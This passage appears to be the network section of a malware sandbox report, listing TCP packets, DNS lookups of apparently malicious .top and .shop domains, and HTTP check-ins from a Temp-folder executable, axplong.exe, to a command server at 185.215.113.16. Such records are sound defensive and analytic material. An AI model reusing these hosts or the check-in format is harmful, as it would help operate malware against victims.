Sep 3, 2024 17:13:23.820851088 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.820868015 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.820902109 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.820991993 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.821005106 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.821014881 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.821027040 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.821038961 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.821050882 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.821053982 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.821053982 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.821060896 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.821074009 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.821074963 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.821084976 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.821096897 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.821105957 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.821110964 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.821110964 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.821132898 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.821139097 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.821146011 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.821156025 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.821166992 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.821185112 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.821209908 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.821252108 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.821474075 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.821487904 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.821497917 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.821511984 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.821540117 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.821566105 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.821614981 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.821626902 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.821639061 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.821650028 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.821656942 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.821664095 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.821676016 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.821686029 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.821713924 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.821713924 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.821724892 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.821834087 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.821846008 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.821855068 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.821871042 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.821880102 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.821891069 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.821901083 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.821903944 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.821903944 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.821912050 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.821923018 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.821926117 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.821933985 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.821944952 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.821955919 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.821957111 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.821958065 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.821968079 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.821980000 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.821981907 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.821991920 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.822016001 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.822036028 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.822316885 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.822329044 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.822339058 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.822355032 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.822365046 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.822371006 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.822381973 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.822390079 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.822390079 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.822393894 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.822407961 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.822421074 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.822428942 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.822455883 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.822479010 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.822479010 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.822501898 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.822514057 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.822525978 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.822535992 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.822545052 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.822551966 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.822566032 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.822570086 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.822585106 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.822588921 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.822601080 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.822607994 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.822612047 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.822623968 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.822637081 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.822642088 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.822669983 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.822685003 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.920790911 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.920805931 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.920818090 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.920828104 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.920840025 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.920850992 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.920862913 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.920862913 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.920875072 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.920923948 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.921459913 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.921472073 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.921482086 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.921488047 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.921557903 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.921557903 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.921591043 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.921602964 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.921614885 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.921650887 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.921650887 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.921775103 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.921787024 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.921797037 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.921801090 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.921812057 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.921832085 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.921844006 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.921852112 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.921853065 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.921859026 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.921922922 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.921922922 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.922032118 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.922044039 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.922086000 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.922236919 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.922249079 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.922257900 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.922269106 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.922280073 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.922287941 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.922292948 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.922318935 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.922318935 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.922369003 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.922373056 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.922477961 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.922544003 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.922554016 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.922600985 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.922694921 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.922707081 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.922717094 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.922728062 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.922739029 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.922750950 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.922763109 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.922772884 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.922772884 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.922775984 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.922791004 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.922817945 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.922830105 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.922832966 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.922841072 CEST	80	49730	52.212.52.84	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 3, 2024 17:13:04.397212029 CEST	192.168.2.8	1.1.1.1	0x13f3	Standard query (0)	ddl.safone.dev	A (IP address)	IN (0x0001)	false
Sep 3, 2024 17:13:32.780112028 CEST	192.168.2.8	1.1.1.1	0x13b5	Standard query (0)	fivexv5vs.top	A (IP address)	IN (0x0001)	false
Sep 3, 2024 17:13:39.861983061 CEST	192.168.2.8	1.1.1.1	0x71f0	Standard query (0)	fivexv5vs.top	A (IP address)	IN (0x0001)	false
Sep 3, 2024 17:13:44.751353025 CEST	192.168.2.8	1.1.1.1	0xc1ef	Standard query (0)	fivexv5vs.top	A (IP address)	IN (0x0001)	false
Sep 3, 2024 17:13:48.317934990 CEST	192.168.2.8	1.1.1.1	0x3b9d	Standard query (0)	fivexv5pn.top	A (IP address)	IN (0x0001)	false
Sep 3, 2024 17:13:51.292469025 CEST	192.168.2.8	1.1.1.1	0x1e07	Standard query (0)	fivexv5vs.top	A (IP address)	IN (0x0001)	false
Sep 3, 2024 17:13:56.294605970 CEST	192.168.2.8	1.1.1.1	0x9b21	Standard query (0)	fivexv5vs.top	A (IP address)	IN (0x0001)	false
Sep 3, 2024 17:13:57.397824049 CEST	192.168.2.8	1.1.1.1	0x9b21	Standard query (0)	fivexv5vs.top	A (IP address)	IN (0x0001)	false
Sep 3, 2024 17:14:00.909904957 CEST	192.168.2.8	1.1.1.1	0x3221	Standard query (0)	millyscroqwp.shop	A (IP address)	IN (0x0001)	false
Sep 3, 2024 17:14:02.079857111 CEST	192.168.2.8	1.1.1.1	0xe228	Standard query (0)	fivexv5vs.top	A (IP address)	IN (0x0001)	false
Sep 3, 2024 17:14:03.631382942 CEST	192.168.2.8	1.1.1.1	0xa0f7	Standard query (0)	locatedblsoqp.shop	A (IP address)	IN (0x0001)	false
Sep 3, 2024 17:14:04.460808992 CEST	192.168.2.8	1.1.1.1	0xd4e	Standard query (0)	transfer.adminforge.de	A (IP address)	IN (0x0001)	false
Sep 3, 2024 17:14:08.189821959 CEST	192.168.2.8	1.1.1.1	0x6db5	Standard query (0)	fivexv5vs.top	A (IP address)	IN (0x0001)	false
Sep 3, 2024 17:14:13.377392054 CEST	192.168.2.8	1.1.1.1	0xabe0	Standard query (0)	fivexv5vs.top	A (IP address)	IN (0x0001)	false
Sep 3, 2024 17:14:14.612647057 CEST	192.168.2.8	1.1.1.1	0xbde1	Standard query (0)	thirtv13vt.top	A (IP address)	IN (0x0001)	false
Sep 3, 2024 17:14:17.772450924 CEST	192.168.2.8	1.1.1.1	0xd8d4	Standard query (0)	fivexv5vs.top	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 3, 2024 17:13:04.424237013 CEST	1.1.1.1	192.168.2.8	0x13f3	No error (0)	ddl.safone.dev	cellular-coral-9r9jw7d9k5kj0dfl28uyy6l8.herokudns.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 3, 2024 17:13:04.424237013 CEST	1.1.1.1	192.168.2.8	0x13f3	No error (0)	cellular-coral-9r9jw7d9k5kj0dfl28uyy6l8.herokudns.com		52.212.52.84	A (IP address)	IN (0x0001)	false
Sep 3, 2024 17:13:04.424237013 CEST	1.1.1.1	192.168.2.8	0x13f3	No error (0)	cellular-coral-9r9jw7d9k5kj0dfl28uyy6l8.herokudns.com		54.247.69.169	A (IP address)	IN (0x0001)	false
Sep 3, 2024 17:13:04.424237013 CEST	1.1.1.1	192.168.2.8	0x13f3	No error (0)	cellular-coral-9r9jw7d9k5kj0dfl28uyy6l8.herokudns.com		63.32.161.232	A (IP address)	IN (0x0001)	false
Sep 3, 2024 17:13:33.298211098 CEST	1.1.1.1	192.168.2.8	0x13b5	Name error (3)	fivexv5vs.top	none	none	A (IP address)	IN (0x0001)	false
Sep 3, 2024 17:13:40.719512939 CEST	1.1.1.1	192.168.2.8	0x71f0	Name error (3)	fivexv5vs.top	none	none	A (IP address)	IN (0x0001)	false
Sep 3, 2024 17:13:45.212176085 CEST	1.1.1.1	192.168.2.8	0xc1ef	Name error (3)	fivexv5vs.top	none	none	A (IP address)	IN (0x0001)	false
Sep 3, 2024 17:13:48.994256973 CEST	1.1.1.1	192.168.2.8	0x3b9d	No error (0)	fivexv5pn.top		195.133.48.136	A (IP address)	IN (0x0001)	false
Sep 3, 2024 17:13:52.112462997 CEST	1.1.1.1	192.168.2.8	0x1e07	Name error (3)	fivexv5vs.top	none	none	A (IP address)	IN (0x0001)	false
Sep 3, 2024 17:13:57.388425112 CEST	1.1.1.1	192.168.2.8	0x9b21	Name error (3)	fivexv5vs.top	none	none	A (IP address)	IN (0x0001)	false
Sep 3, 2024 17:13:57.406841993 CEST	1.1.1.1	192.168.2.8	0x9b21	Name error (3)	fivexv5vs.top	none	none	A (IP address)	IN (0x0001)	false
Sep 3, 2024 17:14:00.934770107 CEST	1.1.1.1	192.168.2.8	0x3221	No error (0)	millyscroqwp.shop		188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 3, 2024 17:14:00.934770107 CEST	1.1.1.1	192.168.2.8	0x3221	No error (0)	millyscroqwp.shop		188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 3, 2024 17:14:02.088059902 CEST	1.1.1.1	192.168.2.8	0xe228	Name error (3)	fivexv5vs.top	none	none	A (IP address)	IN (0x0001)	false
Sep 3, 2024 17:14:03.650188923 CEST	1.1.1.1	192.168.2.8	0xa0f7	No error (0)	locatedblsoqp.shop		188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 3, 2024 17:14:03.650188923 CEST	1.1.1.1	192.168.2.8	0xa0f7	No error (0)	locatedblsoqp.shop		188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 3, 2024 17:14:04.477348089 CEST	1.1.1.1	192.168.2.8	0xd4e	No error (0)	transfer.adminforge.de		176.9.8.206	A (IP address)	IN (0x0001)	false
Sep 3, 2024 17:14:08.851957083 CEST	1.1.1.1	192.168.2.8	0x6db5	Name error (3)	fivexv5vs.top	none	none	A (IP address)	IN (0x0001)	false
Sep 3, 2024 17:14:13.908361912 CEST	1.1.1.1	192.168.2.8	0xabe0	Name error (3)	fivexv5vs.top	none	none	A (IP address)	IN (0x0001)	false
Sep 3, 2024 17:14:15.544699907 CEST	1.1.1.1	192.168.2.8	0xbde1	No error (0)	thirtv13vt.top		195.133.13.230	A (IP address)	IN (0x0001)	false
Sep 3, 2024 17:14:18.530203104 CEST	1.1.1.1	192.168.2.8	0xd8d4	Name error (3)	fivexv5vs.top	none	none	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49711	185.215.113.16	80	3212	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:03.062192917 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:13:03.889269114 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:13:03.890990973 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 32 34 30 43 44 46 39 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A240CDF9FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 3, 2024 17:13:04.390229940 CEST	1226	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 30 62 0d 0a 20 3c 63 3e 31 30 30 30 30 30 32 30 30 31 2b 2b 2b 61 61 30 65 64 33 36 35 35 34 65 31 39 66 65 61 61 31 30 65 34 34 62 37 63 63 30 62 32 36 62 31 64 36 30 39 62 32 34 31 39 62 33 34 63 63 66 35 66 38 62 62 37 32 61 61 61 62 62 35 62 30 35 38 37 32 66 65 66 30 36 33 37 37 33 63 64 61 36 36 39 36 30 35 64 34 62 38 37 61 62 34 63 32 38 38 66 31 33 37 62 65 39 31 65 34 23 31 30 30 30 30 30 34 30 30 31 2b 2b 2b 61 61 30 65 64 33 36 35 35 34 65 31 39 66 62 66 66 64 35 37 34 34 66 36 39 63 35 38 36 37 65 65 38 32 31 34 66 38 31 35 64 62 33 34 39 36 61 33 61 39 61 37 32 30 65 65 65 34 65 61 61 37 34 66 36 66 65 66 61 61 36 33 36 62 37 37 23 31 30 30 30 30 30 35 30 30 31 2b 2b 2b 61 61 30 65 64 33 36 35 35 34 65 31 39 66 62 66 66 64 35 37 34 34 66 36 39 63 35 38 36 37 65 65 38 32 31 34 66 38 31 36 64 62 33 34 62 31 61 38 62 64 65 37 33 31 66 37 62 33 66 66 61 62 34 66 23 31 30 30 30 30 36 36 30 30 31 2b 2b 2b 61 61 30 65 64 33 36 35 35 34 65 31 39 66 62 66 66 64 35 37 34 34 66 36 39 63 35 38 [TRUNCATED] Data Ascii: 40b <c>1000002001+++aa0ed36554e19feaa10e44b7cc0b26b1d609b2419b34ccf5f8bb72aaabb5b05872fef063773cda669605d4b87ab4c288f137be91e4#1000004001+++aa0ed36554e19fbffd5744f69c5867ee8214f815db3496a3a9a720eee4eaa74f6fefaa636b77#1000005001+++aa0ed36554e19fbffd5744f69c5867ee8214f816db34b1a8bde731f7b3ffab4f#1000066001+++aa0ed36554e19fbffd5744f69c5867ee8214f815db3496a3a9a730e8f8fbbf4954eae1607267d36ac114d9a16c#1000129001+++aa0ed36554e19feaa10e44b7cc0b26b1d609b2419b34ccf5febe75afabb5804f7fa3f1763d77c77bcc52ddaa61e1beaed732be89#1000191001+++aa0ed36554e19feaa10e44b7cc0b26b1d609b2419b34ccf5febe71a8a9b5e2046ef6e1397b73cc76ce7bdb984db994#1000228001+++aa0ed36554e19feaa10e44b7cc0b26b1d609b2419b34ccf5ffb073ada8b5804f7ffbf428766ada219b5bcfb1349d9888d22f9d#1000238002+++e312d3611ef49fa1f45a5fea9f5c7cf18216e50adc2dd0a4a4eb6cddf0fbb74f7efdaa636b77#1000241001+++aa0ed36554e19feaa10e44b7cc0b26b1d609b2419b34ccf5feb876aca4b5b15f62e2e028766ada219b5bcfb1349d9888d238b8#1000243001+++aa0ed36554e19fbffd5744f69c5867ee8214f815db3496a3a9 [TRUNCATED]
Sep 3, 2024 17:13:04.391757965 CEST	1226	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 30 62 0d 0a 20 3c 63 3e 31 30 30 30 30 30 32 30 30 31 2b 2b 2b 61 61 30 65 64 33 36 35 35 34 65 31 39 66 65 61 61 31 30 65 34 34 62 37 63 63 30 62 32 36 62 31 64 36 30 39 62 32 34 31 39 62 33 34 63 63 66 35 66 38 62 62 37 32 61 61 61 62 62 35 62 30 35 38 37 32 66 65 66 30 36 33 37 37 33 63 64 61 36 36 39 36 30 35 64 34 62 38 37 61 62 34 63 32 38 38 66 31 33 37 62 65 39 31 65 34 23 31 30 30 30 30 30 34 30 30 31 2b 2b 2b 61 61 30 65 64 33 36 35 35 34 65 31 39 66 62 66 66 64 35 37 34 34 66 36 39 63 35 38 36 37 65 65 38 32 31 34 66 38 31 35 64 62 33 34 39 36 61 33 61 39 61 37 32 30 65 65 65 34 65 61 61 37 34 66 36 66 65 66 61 61 36 33 36 62 37 37 23 31 30 30 30 30 30 35 30 30 31 2b 2b 2b 61 61 30 65 64 33 36 35 35 34 65 31 39 66 62 66 66 64 35 37 34 34 66 36 39 63 35 38 36 37 65 65 38 32 31 34 66 38 31 36 64 62 33 34 62 31 61 38 62 64 65 37 33 31 66 37 62 33 66 66 61 62 34 66 23 31 30 30 30 30 36 36 30 30 31 2b 2b 2b 61 61 30 65 64 33 36 35 35 34 65 31 39 66 62 66 66 64 35 37 34 34 66 36 39 63 35 38 [TRUNCATED] Data Ascii: 40b <c>1000002001+++aa0ed36554e19feaa10e44b7cc0b26b1d609b2419b34ccf5f8bb72aaabb5b05872fef063773cda669605d4b87ab4c288f137be91e4#1000004001+++aa0ed36554e19fbffd5744f69c5867ee8214f815db3496a3a9a720eee4eaa74f6fefaa636b77#1000005001+++aa0ed36554e19fbffd5744f69c5867ee8214f816db34b1a8bde731f7b3ffab4f#1000066001+++aa0ed36554e19fbffd5744f69c5867ee8214f815db3496a3a9a730e8f8fbbf4954eae1607267d36ac114d9a16c#1000129001+++aa0ed36554e19feaa10e44b7cc0b26b1d609b2419b34ccf5febe75afabb5804f7fa3f1763d77c77bcc52ddaa61e1beaed732be89#1000191001+++aa0ed36554e19feaa10e44b7cc0b26b1d609b2419b34ccf5febe71a8a9b5e2046ef6e1397b73cc76ce7bdb984db994#1000228001+++aa0ed36554e19feaa10e44b7cc0b26b1d609b2419b34ccf5ffb073ada8b5804f7ffbf428766ada219b5bcfb1349d9888d22f9d#1000238002+++e312d3611ef49fa1f45a5fea9f5c7cf18216e50adc2dd0a4a4eb6cddf0fbb74f7efdaa636b77#1000241001+++aa0ed36554e19feaa10e44b7cc0b26b1d609b2419b34ccf5feb876aca4b5b15f62e2e028766ada219b5bcfb1349d9888d238b8#1000243001+++aa0ed36554e19fbffd5744f69c5867ee8214f815db3496a3a9 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
